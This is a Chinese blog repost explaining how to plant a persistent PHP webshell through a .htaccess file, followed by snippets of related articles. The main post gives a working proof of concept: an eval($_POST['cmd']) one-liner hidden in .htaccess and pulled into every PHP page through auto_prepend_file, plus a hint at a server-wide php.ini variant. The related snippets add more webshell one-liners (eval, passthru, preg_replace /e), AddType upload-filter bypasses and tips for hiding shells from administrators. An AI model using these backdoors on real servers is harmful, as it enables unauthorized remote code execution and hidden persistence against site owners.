.htaccess后门

最新推荐文章于 2022-05-13 22:21:44 发布
最新推荐文章于 2022-05-13 22:21:44 发布
阅读量184 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/ljpbin/archive/2008/01/17/1043106.html
版权

PHP手册,常看常新:)
PHP有个特性,会根据apache的httpd.conf和.htaccess来覆盖自己php.ini的设置.
恰好,找到两个邪恶的属性:
auto_prepend_file string 指定在主文件之前自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path
特殊值 none 禁止了自动前缀。
auto_append_file string
指定在主文件之后自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path
特殊值 none 禁止了自动后缀。
Note: 如果脚本通过 exit() 终止,则自动后缀不会发生。
于是很简单,利用.htaccess就能包含文件,并且不用修改任何对方的php文件,同目录下所有php文件就被植入木马了.管理员不注意的话可能就被忽略掉.
本地测试了一下,写了个.htaccess文件到我的sphpblog目录中.

#<?php eval($_POST['cmd']);?>
php_value auto_prepend_file ".htaccess"

然后随意访问一下sphpblog中的任意文件.

当然直接包含.haccess文件太明显了,上面一对无关和出错信息会出卖你的后门的.我这里只是PoC,要包含什么就随便各位了.
哦,还有一点,会很方便:
include_path ".;/path/to/php/pear" PHP_INI_ALL   /*不狐:这里是php.ini里面的全局后门
什么意思我就不说了.各位自己琢磨吧,呵呵

转载于:https://www.cnblogs.com/ljpbin/archive/2008/01/17/1043106.html

weixin_30764883
关注
.htaccess
07-19
百度首页 | 百度空间 | 登录 广告停放提高网站流量,centos学习 主页博客相册|个人档案 查看文章 .htaccess怎么用2007-05-16 14:04(文章来源)...这里有一篇很容易让人理解的.htaccess介绍,作为入门文章非常的适合...
小识.htaccess文件
aijie6150的博客
10-18 318
.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过ht...
.htaccess使用指南[转]
Linvo's blog
02-15 631
Part 1 – Introduction介绍Part 2 - .htaccess Commande命令Part 3 - Password protection密码保护Part 1 – Introduction介绍Introduction 介绍In this tutorial you will find out about the .htaccess file
.htaccess文件构成的PHP后门
浅笑996的博客
06-28 2704
1、.htaccess文件 2、文件上传绕过 一般.htaccess可以用来留后门和针对黑名单绕过 创建一个txt写入(png解析为php) AddTypeapplication/x-httpd-php.png 另存为.htaccess 上传.htaccess 必须是网站根路径 3、留后门 可以在.htaccess 加入php解析规则 类似于把文件名包含1的解析成php <FilesMatch"1"> SetHandlerapplication/x-http...
.htaccess 后门
weixin_30512089的博客
08-11 290
<?php <Files ~ "^\.ht"> Order allow,deny Allow from all </Files> AddType application/x-httpd-php .htaccess # <?php @eval($_GET[value]);?> # or <?php passthru($_GET['c...
.htaccess做更隐蔽的后门
weixin_34269583的博客
05-21 203
作者:kindle From:http://key0.cn/?p=285 万恶的引用功能,下文复制粘贴无用,请自行将双引号修改 .htaccess内容如下 #首先允许web访问这个文件 <Files ~ “^\.ht”> Order allow,deny Allow from all </Files> RedirectMatch ...
php后门木马常用命令.pdf
10-10
PHP后门木马常用的函数可以分为四种类型:执行系统命令、代码执行与加密、文件包含与生成、.htaccess。 执行系统命令 * system 函数:可以执行系统命令,例如`system($_GET['cmd']);` * passthru 函数:可以执行...
仿企业发卡源码无后门.zip
07-09
【标题】"仿企业发卡源码无后门.zip" 提供的是一个基于 PHP 的发卡系统源代码,强调无后门,确保安全性。这样的源码通常用于搭建在线充值或虚拟商品发放平台,如游戏点卡、会员卡密等。 【描述】中提到的 "仿企业...
.httacces文件的密码保护和防止盗链的实现方法
01-11
尽管JavaScrip等也能做到,但只有.htaccess具有完美的安全性(即访问者必须知晓密码才可以访问目录,并且绝无“后门”可走)。 利用.htaccess将一个目录加上密码保护分两个步骤。第一步是在你的.htaccess文档里加上...
destoon利用Rewrite规则设置网站安全
10-25
这些扩展名的文件可能包含后门程序,而通过重写规则可以将此类请求重定向到一个固定的404错误页面,这样这些后门程序就无法被执行。具体规则为: RewriteRule^(.*)\.(asp|aspx|asa|asax|dll|jsp|cgi|fcgi|pl)(.*)$/...
修改.htaccess执行非php文件
冷风
06-18 5641
是个很老技术了,有一个php上传,可以控制上传的文件名,但服务器端做了过滤,文件名中不能包含php字符串,各种绕过无效。后面就上传了一个 .htaccess文件里面只有一句AddType application/x-httpd-php .abc之后,把php后门改成 xx.abc上传上去就可以执行了。
xss添加php后门,利用.Htaccess文件构成的PHP后门
weixin_39611725的博客
03-18 353
0x00 .Htaccess简介.htaccess 是Apache HTTP Server的文件目录系统级别的配置文件的默认的名字。它提供了在主配置文件中定义用户自定义指令的支持。 这些配置指令需要在 .htaccess 上下文 和用户需要的适当许可。平时开发用的最多的就是URL重定向功能。0x01 开启.htaccessApache中修改配置文件httpd.conf修改如下内容Options F...
那些强悍的PHP一句话后门
大方子
08-06 9501
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马   PHP   1 2 3 4 ...
后门---php.ini/.htaccess/.user.ini-------------------利用 auto_prepend_file 和 include_path
bylfsj的博客
10-31 818
From:http://www.cnblogs.com/iamstudy/articles/php_ini_backdoor.html 原理 php.ini中有这几种模式: PHP_INI_*模式的定义 文件配置属性 官方解释 auto_prepend_file 意味这是在php脚本执行前会执行这个参数设置的脚本,然后这个参数的脚本所在目录...
php后门文件处理方式_PHP后门隐藏的一些技巧总结
weixin_33760049的博客
03-09 906
前言如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。1、隐藏文件使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。attrib +s +a +h +r shell.php //隐藏shell.php文件2、修改文件时间属性当你试图在一...
PHP一句话后门
xyang
05-26 3139
404 Not Found Not Found The requested URL was not found on this server. <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?>
Kali 渗透测试:利用HTA文件进行渗透攻击
Liu_Bruce的博客
05-13 2068
Kali 渗透测试:利用HTA文件进行渗透攻击 由于浏览器安全技术发展很快,很多时候面对一些安全的浏览器(就是暂时没有发现漏洞的浏览器), 这时通常需要选择一种不需要依赖漏洞的手段,这种手段看起来是个正常的行为,如让访问伪造网站的受害者下载一个插件,但是这个文件不能是EXE文件这种很容易被发现的文件, 因此,HTML应用程序(HTML Application,HTA)文件就成了最好的选择。 HTA文件可以使用HTML中的绝大多数标签、脚本等。直接将HTML保存成HTA文件,就是一个能够独立运行的软件。与普通
.user.ini在后门中的利用
火柴人的博客
04-06 679
转载user.ini文件构成的PHP后门 0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的f...
.htaccess使用详解与实战
"htaccess使用手册,Apache服务器配置文件,用于网站目录权限控制和URL重写等操作。" 本文档详细介绍了`.htaccess`文件的使用方法,它是Apache服务器上的一种配置文件,允许用户在网站根目录下进行局部的服务器配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值